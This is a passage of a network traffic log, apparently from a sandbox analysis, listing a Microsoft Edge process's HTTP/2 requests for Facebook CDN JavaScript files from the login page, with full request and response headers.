permissions-policy: accelerometer=(), ambient-light-sensor=(), bluetooth=(), camera=(), geolocation=(), gyroscope=(), hid=(), idle-detection=(), magnetometer=(), microphone=(), midi=(), payment=(), screen-wake-lock=(), serial=(), usb=()
cross-origin-resource-policy: cross-origin
x-content-type-options: nosniff
reporting-endpoints:
origin-agent-cluster: ?0
content-md5: ibx/YS3+M1U14eOcawxFtw==
x-fb-debug: q+VpqRx4mVqybw80XBj78bdtSshb+Ms6pweHYU1uAT1GL8p9LMyEfAqGhnciJhS+KYSU5asAadnNXC8FZCZzoQ==
content-length: 2161
date: Fri, 03 Nov 2023 04:50:16 GMT
alt-svc: h3=":443"; ma=86400
GET

https://static.xx.fbcdn.net/rsrc.php/v3/yt/r/d4QqVJOdC1V.js?_nc_x=Ij3Wp8lg5Kz

MicrosoftEdgeCP.exe

Remote address:

157.240.5.10:443

Request

GET /rsrc.php/v3/yt/r/d4QqVJOdC1V.js?_nc_x=Ij3Wp8lg5Kz HTTP/2.0
host: static.xx.fbcdn.net
accept: application/javascript, */*;q=0.8
referer: https://www.facebook.com/login
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

vary: Accept-Encoding
content-encoding: br
content-type: application/x-javascript; charset=utf-8
access-control-allow-origin: *
last-modified: Mon, 01 Jan 2001 08:00:00 GMT
expires: Wed, 30 Oct 2024 16:01:44 GMT
cache-control: public,max-age=31536000,immutable
timing-allow-origin: *
document-policy: force-load-at-top
permissions-policy: accelerometer=(), ambient-light-sensor=(), bluetooth=(), camera=(), geolocation=(), gyroscope=(), hid=(), idle-detection=(), magnetometer=(), microphone=(), midi=(), payment=(), screen-wake-lock=(), serial=(), usb=()
cross-origin-resource-policy: cross-origin
x-content-type-options: nosniff
reporting-endpoints:
content-md5: acYXb04KM2d7EwkrV8wFuw==
x-fb-debug: 5p3+DBCocKmaomP4vMrU2KobX0D/IWDYqZw0lHvoaHFV23A7TBabqVE0mzUF4WxZrrAS73JWMfG4EKjluCU0Ag==
content-length: 15537
date: Fri, 03 Nov 2023 04:50:16 GMT
alt-svc: h3=":443"; ma=86400
GET

https://static.xx.fbcdn.net/rsrc.php/v3/yc/r/pD68cOkOMec.js?_nc_x=Ij3Wp8lg5Kz

MicrosoftEdgeCP.exe

Remote address:

157.240.5.10:443

Request

GET /rsrc.php/v3/yc/r/pD68cOkOMec.js?_nc_x=Ij3Wp8lg5Kz HTTP/2.0
host: static.xx.fbcdn.net
accept: application/javascript, */*;q=0.8
referer: https://www.facebook.com/login
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

vary: Accept-Encoding
content-encoding: br
content-type: application/x-javascript; charset=utf-8
access-control-allow-origin: *
last-modified: Mon, 01 Jan 2001 08:00:00 GMT
expires: Sun, 27 Oct 2024 15:37:48 GMT
cache-control: public,max-age=31536000,immutable
timing-allow-origin: *
document-policy: force-load-at-top
permissions-policy: accelerometer=(), ambient-light-sensor=(), bluetooth=(), camera=(), geolocation=(), gyroscope=(), hid=(), idle-detection=(), magnetometer=(), microphone=(), midi=(), payment=(), screen-wake-lock=(), serial=(), usb=()
cross-origin-resource-policy: cross-origin
x-content-type-options: nosniff
reporting-endpoints:
origin-agent-cluster: ?0
content-md5: 95wuAyZvurXYMf9v3OdLQg==
x-fb-debug: G/ENDG7fTXt4BqnCeO8ycSUGBmLj0n/RpQa3vbZv1yG7JSV+7hv3MBH0kbvNPLODSYOCoYcIOh5KZVUf2qRSgQ==
content-length: 4504
date: Fri, 03 Nov 2023 04:50:17 GMT
alt-svc: h3=":443"; ma=86400
GET

https://static.xx.fbcdn.net/rsrc.php/v3/y9/r/bG0oiWXQIFv.js?_nc_x=Ij3Wp8lg5Kz

MicrosoftEdgeCP.exe

Remote address:

157.240.5.10:443

Request

GET /rsrc.php/v3/y9/r/bG0oiWXQIFv.js?_nc_x=Ij3Wp8lg5Kz HTTP/2.0
host: static.xx.fbcdn.net
accept: application/javascript, */*;q=0.8
referer: https://www.facebook.com/login
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

vary: Accept-Encoding
content-encoding: br
content-type: application/x-javascript; charset=utf-8
access-control-allow-origin: *
last-modified: Mon, 01 Jan 2001 08:00:00 GMT
expires: Thu, 24 Oct 2024 14:38:03 GMT
cache-control: public,max-age=31536000,immutable
timing-allow-origin: *
document-policy: force-load-at-top
permissions-policy: accelerometer=(), ambient-light-sensor=(), bluetooth=(), camera=(), gyroscope=(), hid=(), idle-detection=(), magnetometer=(), microphone=(), midi=(), payment=(), screen-wake-lock=(), serial=(), usb=()
cross-origin-resource-policy: cross-origin
x-content-type-options: nosniff
reporting-endpoints:
origin-agent-cluster: ?0
content-md5: mhtzz0xYjDwzfzFxGZtp5A==
x-fb-debug: yQAmunWcQF5JnlsfCfmGDcOtPofB3SRNvOEomnOXuCaMXTDK65xQIXXL+Tq0Y/aHgQXg/W2SMjdcbdPijgFRyw==
content-length: 7383
date: Fri, 03 Nov 2023 04:50:17 GMT
alt-svc: h3=":443"; ma=86400
GET

https://static.xx.fbcdn.net/rsrc.php/v3/yt/r/waLvPG4m_lK.js?_nc_x=Ij3Wp8lg5Kz

MicrosoftEdgeCP.exe

Remote address:

157.240.5.10:443

Request

GET /rsrc.php/v3/yt/r/waLvPG4m_lK.js?_nc_x=Ij3Wp8lg5Kz HTTP/2.0
host: static.xx.fbcdn.net
accept: application/javascript, */*;q=0.8
referer: https://www.facebook.com/login
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

vary: Accept-Encoding
content-encoding: br
content-type: application/x-javascript; charset=utf-8
access-control-allow-origin: *
last-modified: Mon, 01 Jan 2001 08:00:00 GMT
expires: Sat, 26 Oct 2024 15:37:17 GMT
cache-control: public,max-age=31536000,immutable
timing-allow-origin: *
document-policy: force-load-at-top
permissions-policy: accelerometer=(), ambient-light-sensor=(), bluetooth=(), camera=(), geolocation=(), gyroscope=(), hid=(), idle-detection=(), magnetometer=(), microphone=(), midi=(), payment=(), screen-wake-lock=(), serial=(), usb=()
cross-origin-resource-policy: cross-origin
x-content-type-options: nosniff
reporting-endpoints:
content-md5: x0igbgZNaXUgqs5LbeZrjA==
x-fb-debug: unVml5jNN0ZidUjj6jITcKldykVyySRs1BXvmkSmxgIpqEg6JrnX/kb+BgPw69gHwSqwe75OOevnnKhhKMLuWg==
content-length: 7430
date: Fri, 03 Nov 2023 04:50:17 GMT
alt-svc: h3=":443"; ma=86400
GET

https://static.xx.fbcdn.net/rsrc.php/v3/yv/r/N9t1W9oe3ma.js?_nc_x=Ij3Wp8lg5Kz

MicrosoftEdgeCP.exe

Remote address:

157.240.5.10:443

Request

GET /rsrc.php/v3/yv/r/N9t1W9oe3ma.js?_nc_x=Ij3Wp8lg5Kz HTTP/2.0
host: static.xx.fbcdn.net
accept: application/javascript, */*;q=0.8
referer: https://www.facebook.com/login
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

vary: Accept-Encoding
content-encoding: br
content-type: application/x-javascript; charset=utf-8
access-control-allow-origin: *
last-modified: Mon, 01 Jan 2001 08:00:00 GMT
expires: Thu, 31 Oct 2024 21:16:47 GMT
cache-control: public,max-age=31536000,immutable
timing-allow-origin: *
document-policy: force-load-at-top
permissions-policy: accelerometer=(), ambient-light-sensor=(), bluetooth=(), camera=(), geolocation=(), gyroscope=(), hid=(), idle-detection=(), magnetometer=(), microphone=(), midi=(), payment=(), screen-wake-lock=(), serial=(), usb=()
cross-origin-resource-policy: cross-origin
x-content-type-options: nosniff
reporting-endpoints:
origin-agent-cluster: ?0
content-md5: nZgLQrniSukxvIJvkZmsKQ==
x-fb-debug: q4ONpUwsXWW40onv8Mi1siNHhOvAiCRexAG0gm7Gl8fbay5pPJeALWJ/E+9vGJSXMMoBHmj906dPUaSuHoCEfw==
content-length: 5811
date: Fri, 03 Nov 2023 04:50:17 GMT
alt-svc: h3=":443"; ma=86400
GET

https://static.xx.fbcdn.net/rsrc.php/v3/yz/r/lFK_RCKM9IT.js?_nc_x=Ij3Wp8lg5Kz

MicrosoftEdgeCP.exe

Remote address:

157.240.5.10:443

Request

GET /rsrc.php/v3/yz/r/lFK_RCKM9IT.js?_nc_x=Ij3Wp8lg5Kz HTTP/2.0
host: static.xx.fbcdn.net
accept: application/javascript, */*;q=0.8
referer: https://www.facebook.com/login
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

vary: Accept-Encoding
content-encoding: br
content-type: application/x-javascript; charset=utf-8
access-control-allow-origin: *
last-modified: Mon, 01 Jan 2001 08:00:00 GMT
expires: Mon, 28 Oct 2024 17:04:42 GMT
cache-control: public,max-age=31536000,immutable
timing-allow-origin: *
document-policy: force-load-at-top
permissions-policy: accelerometer=(), ambient-light-sensor=(), bluetooth=(), camera=(), geolocation=(), gyroscope=(), hid=(), idle-detection=(), magnetometer=(), microphone=(), midi=(), payment=(), screen-wake-lock=(), serial=(), usb=()
cross-origin-resource-policy: cross-origin
x-content-type-options: nosniff
reporting-endpoints:
content-md5: 8dfASsSkIxmrAAqQotd3rg==
x-fb-debug: sVi3fwk5jOkWPl03l1Yj0bykfYWDAy0qXpwvjjUdgRfEh9RpG1ZJSa9dUIyhxFZNDXnfKV9D+/iMHQU1SGmP5g==
content-length: 3066
date: Fri, 03 Nov 2023 04:50:17 GMT
alt-svc: h3=":443"; ma=86400
GET

https://static.xx.fbcdn.net/rsrc.php/v3/yF/r/p55HfXW__mM.js?_nc_x=Ij3Wp8lg5Kz

MicrosoftEdgeCP.exe

Remote address:

157.240.5.10:443

Request

GET /rsrc.php/v3/yF/r/p55HfXW__mM.js?_nc_x=Ij3Wp8lg5Kz HTTP/2.0
host: static.xx.fbcdn.net
accept: application/javascript, */*;q=0.8
referer: https://www.facebook.com/login
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

vary: Accept-Encoding
content-encoding: br
content-type: application/x-javascript; charset=utf-8
access-control-allow-origin: *
last-modified: Mon, 01 Jan 2001 08:00:00 GMT
expires: Fri, 01 Nov 2024 03:28:49 GMT
cache-control: public,max-age=31536000,immutable
timing-allow-origin: *
document-policy: force-load-at-top
permissions-policy: accelerometer=(), ambient-light-sensor=(), bluetooth=(), camera=(), geolocation=(), gyroscope=(), hid=(), idle-detection=(), magnetometer=(), microphone=(), midi=(), payment=(), screen-wake-lock=(), serial=(), usb=()
cross-origin-resource-policy: cross-origin
x-content-type-options: nosniff
reporting-endpoints:
x-fb-optimizer: 0
content-md5: L5E9gSgR735vyjAzTFly4g==
x-fb-debug: dKG8ciEaNDcCKLnAFIkK/WB0Glml4oY8bccJGbrkbLHyvB2k2LT7pRxEDDE68p/iyqicXSmtiG8fpEO0vQqnZQ==
content-length: 293
date: Fri, 03 Nov 2023 04:50:17 GMT
alt-svc: h3=":443"; ma=86400
GET

https://static.xx.fbcdn.net/rsrc.php/v3/y0/r/bad2R-_Mb01.js?_nc_x=Ij3Wp8lg5Kz

MicrosoftEdgeCP.exe

Remote address:

157.240.5.10:443

Request

GET /rsrc.php/v3/y0/r/bad2R-_Mb01.js?_nc_x=Ij3Wp8lg5Kz HTTP/2.0
host: static.xx.fbcdn.net
accept: application/javascript, */*;q=0.8
referer: https://www.facebook.com/login
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

vary: Accept-Encoding
content-encoding: br
content-type: application/x-javascript; charset=utf-8
access-control-allow-origin: *
last-modified: Mon, 01 Jan 2001 08:00:00 GMT
expires: Fri, 01 Nov 2024 20:52:12 GMT
cache-control: public,max-age=31536000,immutable
timing-allow-origin: *
document-policy: force-load-at-top
permissions-policy: accelerometer=(), ambient-light-sensor=(), bluetooth=(), camera=(), geolocation=(), gyroscope=(), hid=(), idle-detection=(), magnetometer=(), microphone=(), midi=(), payment=(), screen-wake-lock=(), serial=(), usb=()
cross-origin-resource-policy: cross-origin
x-content-type-options: nosniff
reporting-endpoints:
origin-agent-cluster: ?0
content-md5: W/vLRsjPgdGzzvSEY3pdJg==
x-fb-debug: 291kr1MHJwnEsfBzRWtQb/WESJCKu76DTR0R9xoakR2xsqFGcbZq9dFy3rcCdZedu7l+X37tqv8wRm+X0U96nQ==
content-length: 5997
date: Fri, 03 Nov 2023 04:50:17 GMT
alt-svc: h3=":443"; ma=86400
GET

https://static.xx.fbcdn.net/rsrc.php/v3/yU/r/Iz6P3cvDa5O.js?_nc_x=Ij3Wp8lg5Kz

MicrosoftEdgeCP.exe

Remote address:

157.240.5.10:443

Request

GET /rsrc.php/v3/yU/r/Iz6P3cvDa5O.js?_nc_x=Ij3Wp8lg5Kz HTTP/2.0
host: static.xx.fbcdn.net
accept: application/javascript, */*;q=0.8
referer: https://www.facebook.com/login
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

vary: Accept-Encoding
content-encoding: br
content-type: application/x-javascript; charset=utf-8
access-control-allow-origin: *
last-modified: Mon, 01 Jan 2001 08:00:00 GMT
expires: Tue, 29 Oct 2024 15:44:38 GMT
cache-control: public,max-age=31536000,immutable
timing-allow-origin: *
document-policy: force-load-at-top
permissions-policy: accelerometer=(), ambient-light-sensor=(), bluetooth=(), camera=(), geolocation=(), gyroscope=(), hid=(), idle-detection=(), magnetometer=(), microphone=(), midi=(), payment=(), screen-wake-lock=(), serial=(), usb=()
cross-origin-resource-policy: cross-origin
x-content-type-options: nosniff
reporting-endpoints:
origin-agent-cluster: ?0
content-md5: l6sZAZVFikdfymFRONS2mw==
x-fb-debug: bs26FKSGjnkV0Lg3KBwl4xg9kI3sMpYCHp8+q6xSJT/GfVugoB8V5Y5Js6yU8Puz1cxoQ333J4uVuRvUAm2dBA==
content-length: 5615
date: Fri, 03 Nov 2023 04:50:17 GMT
alt-svc: h3=":443"; ma=86400
GET

https://static.xx.fbcdn.net/rsrc.php/v3/yv/r/qvzskUrYlYC.js?_nc_x=Ij3Wp8lg5Kz

MicrosoftEdgeCP.exe

Remote address:

157.240.5.10:443

Request

GET /rsrc.php/v3/yv/r/qvzskUrYlYC.js?_nc_x=Ij3Wp8lg5Kz HTTP/2.0
host: static.xx.fbcdn.net
accept: application/javascript, */*;q=0.8
referer: https://www.facebook.com/login
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

vary: Accept-Encoding
content-encoding: br
content-type: application/x-javascript; charset=utf-8
access-control-allow-origin: *
last-modified: Mon, 01 Jan 2001 08:00:00 GMT
expires: Thu, 31 Oct 2024 16:23:19 GMT
cache-control: public,max-age=31536000,immutable
timing-allow-origin: *
document-policy: force-load-at-top
permissions-policy: accelerometer=(), ambient-light-sensor=(), bluetooth=(), camera=(), geolocation=(), gyroscope=(), hid=(), idle-detection=(), magnetometer=(), microphone=(), midi=(), payment=(), screen-wake-lock=(), serial=(), usb=()
cross-origin-resource-policy: cross-origin
x-content-type-options: nosniff
reporting-endpoints:
origin-agent-cluster: ?0
content-md5: qtIMo01jnyllLmLaSrWPNQ==
x-fb-debug: Guu6gRfAp2m8VK/gd7sZ4Dr2MgV/tk2QV6kYaLneubXkBaUCoGlkXLgEj1CAIHjsy2iuqxJKNdg0LdQ1wO3c9Q==
content-length: 10917
date: Fri, 03 Nov 2023 04:50:19 GMT
alt-svc: h3=":443"; ma=86400
GET

https://static.xx.fbcdn.net/rsrc.php/v3/yp/r/sKtrEJAtiUM.js?_nc_x=Ij3Wp8lg5Kz

MicrosoftEdgeCP.exe

Remote address:

157.240.5.10:443

Request

GET /rsrc.php/v3/yp/r/sKtrEJAtiUM.js?_nc_x=Ij3Wp8lg5Kz HTTP/2.0
host: static.xx.fbcdn.net
accept: application/javascript, */*;q=0.8
referer: https://www.facebook.com/login
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

vary: Accept-Encoding
content-encoding: br
content-type: application/x-javascript; charset=utf-8
access-control-allow-origin: *
last-modified: Mon, 01 Jan 2001 08:00:00 GMT
expires: Wed, 30 Oct 2024 12:52:02 GMT
cache-control: public,max-age=31536000,immutable
timing-allow-origin: *
document-policy: force-load-at-top
permissions-policy: accelerometer=(), ambient-light-sensor=(), bluetooth=(), camera=(), geolocation=(), gyroscope=(), hid=(), idle-detection=(), magnetometer=(), microphone=(), midi=(), payment=(), screen-wake-lock=(), serial=(), usb=()
cross-origin-resource-policy: cross-origin
x-content-type-options: nosniff
reporting-endpoints:
origin-agent-cluster: ?0
content-md5: ykBL64qvZzhD2Soyh7PHeA==
x-fb-debug: QtxyY2sQt54kgpCxJAZqjvaura2B170Md8fTK7YKzQQryi/pyR13vrncWOScrIBQQ3hHFnVii2uotro36+OTwQ==
content-length: 9401
date: Fri, 03 Nov 2023 04:50:19 GMT
alt-svc: h3=":443"; ma=86400
GET

https://static.xx.fbcdn.net/rsrc.php/v3/yG/r/1-4kfeCLxqe.js?_nc_x=Ij3Wp8lg5Kz

MicrosoftEdgeCP.exe

Remote address:

157.240.5.10:443

Request

GET /rsrc.php/v3/yG/r/1-4kfeCLxqe.js?_nc_x=Ij3Wp8lg5Kz HTTP/2.0
host: static.xx.fbcdn.net
accept: application/javascript, */*;q=0.8
referer: https://www.facebook.com/login
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

vary: Accept-Encoding
content-encoding: br
content-type: application/x-javascript; charset=utf-8
access-control-allow-origin: *
last-modified: Mon, 01 Jan 2001 08:00:00 GMT
expires: Sat, 26 Oct 2024 15:37:18 GMT
cache-control: public,max-age=31536000,immutable
timing-allow-origin: *
document-policy: force-load-at-top
permissions-policy: accelerometer=(), ambient-light-sensor=(), bluetooth=(), camera=(), geolocation=(), gyroscope=(), hid=(), idle-detection=(), magnetometer=(), microphone=(), midi=(), payment=(), screen-wake-lock=(), serial=(), usb=()
cross-origin-resource-policy: cross-origin
x-content-type-options: nosniff
reporting-endpoints:
content-md5: gGIhu2jw/N6ze1zaQmL8Pg==
x-fb-debug: EGrz6jK7q8mjokyRzPDl+b4pXzPQefQsly0AlXuQLN+QY+mdenCwWMFnWhCqEi6r8yuwetD2WybYcZPlLY2A2A==
content-length: 2714
date: Fri, 03 Nov 2023 04:50:20 GMT
alt-svc: h3=":443"; ma=86400
GET

https://static.xx.fbcdn.net/rsrc.php/v3/yW/r/XJ_y1l4asNb.js?_nc_x=Ij3Wp8lg5Kz

MicrosoftEdgeCP.exe

Remote address:

157.240.5.10:443

Request

GET /rsrc.php/v3/yW/r/XJ_y1l4asNb.js?_nc_x=Ij3Wp8lg5Kz HTTP/2.0
host: static.xx.fbcdn.net
accept: application/javascript, */*;q=0.8
referer: https://www.facebook.com/login
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

vary: Accept-Encoding
content-encoding: br
content-type: application/x-javascript; charset=utf-8
access-control-allow-origin: *
last-modified: Mon, 01 Jan 2001 08:00:00 GMT
expires: Sat, 26 Oct 2024 16:10:52 GMT
cache-control: public,max-age=31536000,immutable
timing-allow-origin: *
document-policy: force-load-at-top
permissions-policy: accelerometer=(), ambient-light-sensor=(), bluetooth=(), camera=(), geolocation=(), gyroscope=(), hid=(), idle-detection=(), magnetometer=(), microphone=(), midi=(), payment=(), screen-wake-lock=(), serial=(), usb=()
cross-origin-resource-policy: cross-origin
x-content-type-options: nosniff
reporting-endpoints:
origin-agent-cluster: ?0
content-md5: 9vszJT6BqQRIPckjnD5VeA==
x-fb-debug: lgY9WWg+3UBcHxpzWgf/2aWCt3S/3lu1ZiAJ7RS41I0WvfxAe8Hf0KUCJb+w62o7wcThZrx4i1dAvH7VAF8saA==
content-length: 2232
date: Fri, 03 Nov 2023 04:50:20 GMT
alt-svc: h3=":443"; ma=86400
GET

https://static.xx.fbcdn.net/rsrc.php/v3/y3/r/J6LaYTk1hL6.js?_nc_x=Ij3Wp8lg5Kz

MicrosoftEdgeCP.exe

Remote address:

157.240.5.10:443

Request

GET /rsrc.php/v3/y3/r/J6LaYTk1hL6.js?_nc_x=Ij3Wp8lg5Kz HTTP/2.0
host: static.xx.fbcdn.net
accept: application/javascript, */*;q=0.8
referer: https://www.facebook.com/login
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

vary: Accept-Encoding
content-encoding: br
content-type: application/x-javascript; charset=utf-8
access-control-allow-origin: *
last-modified: Mon, 01 Jan 2001 08:00:00 GMT
expires: Fri, 01 Nov 2024 18:05:53 GMT
cache-control: public,max-age=31536000,immutable
timing-allow-origin: *
document-policy: force-load-at-top
permissions-policy: accelerometer=(), ambient-light-sensor=(), bluetooth=(), camera=(), geolocation=(), gyroscope=(), hid=(), idle-detection=(), magnetometer=(), microphone=(), midi=(), payment=(), screen-wake-lock=(), serial=(), usb=()
cross-origin-resource-policy: cross-origin
x-content-type-options: nosniff
reporting-endpoints:
origin-agent-cluster: ?0
content-md5: NiCZ03oor+vACJ0yep0hWQ==
x-fb-debug: eTKVs9cLWX4Qt20xo1fJWsJfz8WMQUcrdJysQGI0RsmvGO8L6SfPU8nkl+SgxlrhQDRbni8q3d7Z5ujxsi+9Ug==
content-length: 1966
date: Fri, 03 Nov 2023 04:50:20 GMT
alt-svc: h3=":443"; ma=86400
GET

https://static.xx.fbcdn.net/rsrc.php/v3/yq/r/NXHrzhfsS_6.js?_nc_x=Ij3Wp8lg5Kz

MicrosoftEdgeCP.exe

Remote address:

157.240.5.10:443

Request

GET /rsrc.php/v3/yq/r/NXHrzhfsS_6.js?_nc_x=Ij3Wp8lg5Kz HTTP/2.0
host: static.xx.fbcdn.net
accept: application/javascript, */*;q=0.8
referer: https://www.facebook.com/login
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

vary: Accept-Encoding
content-encoding: br
content-type: application/x-javascript; charset=utf-8
access-control-allow-origin: *
last-modified: Mon, 01 Jan 2001 08:00:00 GMT
expires: Sat, 26 Oct 2024 15:47:43 GMT
cache-control: public,max-age=31536000,immutable
timing-allow-origin: *
document-policy: force-load-at-top
permissions-policy: accelerometer=(), ambient-light-sensor=(), bluetooth=(), camera=(), geolocation=(), gyroscope=(), hid=(), idle-detection=(), magnetometer=(), microphone=(), midi=(), payment=(), screen-wake-lock=(), serial=(), usb=()
cross-origin-resource-policy: cross-origin
x-content-type-options: nosniff
reporting-endpoints:
origin-agent-cluster: ?0
content-md5: vYIjq7m1RY2AHn1ftQNA2Q==
x-fb-debug: UAcumYGXJmTLs0qGLUM6naPxYtpa5mBxtoamNuLxgkBvYrtTugFsKOFDPg9p1jvCCQePbOtCcO8QhG0rNEjLqQ==
content-length: 11050
date: Fri, 03 Nov 2023 04:50:20 GMT
alt-svc: h3=":443"; ma=86400
GET

https://static.xx.fbcdn.net/rsrc.php/v3/yN/r/RkKp7NL-4Sq.js?_nc_x=Ij3Wp8lg5Kz

MicrosoftEdgeCP.exe

Remote address:

157.240.5.10:443

Request

GET /rsrc.php/v3/yN/r/RkKp7NL-4Sq.js?_nc_x=Ij3Wp8lg5Kz HTTP/2.0
host: static.xx.fbcdn.net
accept: application/javascript, */*;q=0.8
referer: https://www.facebook.com/login
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

vary: Accept-Encoding
content-encoding: br
content-type: application/x-javascript; charset=utf-8
access-control-allow-origin: *
last-modified: Mon, 01 Jan 2001 08:00:00 GMT
expires: Thu, 31 Oct 2024 16:05:04 GMT
cache-control: public,max-age=31536000,immutable
timing-allow-origin: *
document-policy: force-load-at-top
permissions-policy: accelerometer=(), ambient-light-sensor=(), bluetooth=(), camera=(), geolocation=(), gyroscope=(), hid=(), idle-detection=(), magnetometer=(), microphone=(), midi=(), payment=(), screen-wake-lock=(), serial=(), usb=()
cross-origin-resource-policy: cross-origin
x-content-type-options: nosniff
reporting-endpoints:
origin-agent-cluster: ?0
content-md5: /FWJMGclOLql1GNGlz5ejQ==
x-fb-debug: s7sB6KjCwDScYGmQUaFl68ODkxPM3DeTtLcMREs6WtmorzOkWMLeBXaoaABoKNs5Z3Exl+qLStoE3YVmFWZDuQ==
content-length: 1108
date: Fri, 03 Nov 2023 04:50:20 GMT
alt-svc: h3=":443"; ma=86400
GET

https://static.xx.fbcdn.net/rsrc.php/v3/yW/r/8wkP5LeHDwh.js?_nc_x=Ij3Wp8lg5Kz

MicrosoftEdgeCP.exe

Remote address:

157.240.5.10:443

Request

GET /rsrc.php/v3/yW/r/8wkP5LeHDwh.js?_nc_x=Ij3Wp8lg5Kz HTTP/2.0
host: static.xx.fbcdn.net
accept: application/javascript, */*;q=0.8
referer: https://www.facebook.com/login
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

vary: Accept-Encoding
content-encoding: br
content-type: application/x-javascript; charset=utf-8
access-control-allow-origin: *
last-modified: Mon, 01 Jan 2001 08:00:00 GMT
expires: Sat, 26 Oct 2024 15:37:18 GMT
cache-control: public,max-age=31536000,immutable
timing-allow-origin: *
document-policy: force-load-at-top
permissions-policy: accelerometer=(), ambient-light-sensor=(), bluetooth=(), camera=(), geolocation=(), gyroscope=(), hid=(), idle-detection=(), magnetometer=(), microphone=(), midi=(), payment=(), screen-wake-lock=(), serial=(), usb=()
cross-origin-resource-policy: cross-origin
x-content-type-options: nosniff
reporting-endpoints:
content-md5: NPtWdbtL0L5REMPAQP9vkQ==
x-fb-debug: WQps8iW3A2GU14UIb29BEH/x2dP1T8be8XTv2CvfW0dydJ6lKqHpYx+rsUi63mdkfyn7HcDsPBQkEtK6HzUWWw==
content-length: 1856
date: Fri, 03 Nov 2023 04:50:20 GMT
alt-svc: h3=":443"; ma=86400
GET

https://static.xx.fbcdn.net/rsrc.php/v3/yB/r/f8sllusvByo.js?_nc_x=Ij3Wp8lg5Kz

MicrosoftEdgeCP.exe

Remote address:

157.240.5.10:443

Request

GET /rsrc.php/v3/yB/r/f8sllusvByo.js?_nc_x=Ij3Wp8lg5Kz HTTP/2.0
host: static.xx.fbcdn.net
accept: application/javascript, */*;q=0.8
referer: https://www.facebook.com/login
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

vary: Accept-Encoding
content-encoding: br
content-type: application/x-javascript; charset=utf-8
access-control-allow-origin: *
last-modified: Mon, 01 Jan 2001 08:00:00 GMT
expires: Sat, 26 Oct 2024 15:37:18 GMT
cache-control: public,max-age=31536000,immutable
timing-allow-origin: *
document-policy: force-load-at-top
permissions-policy: accelerometer=(), ambient-light-sensor=(), bluetooth=(), camera=(), geolocation=(), gyroscope=(), hid=(), idle-detection=(), magnetometer=(), microphone=(), midi=(), payment=(), screen-wake-lock=(), serial=(), usb=()
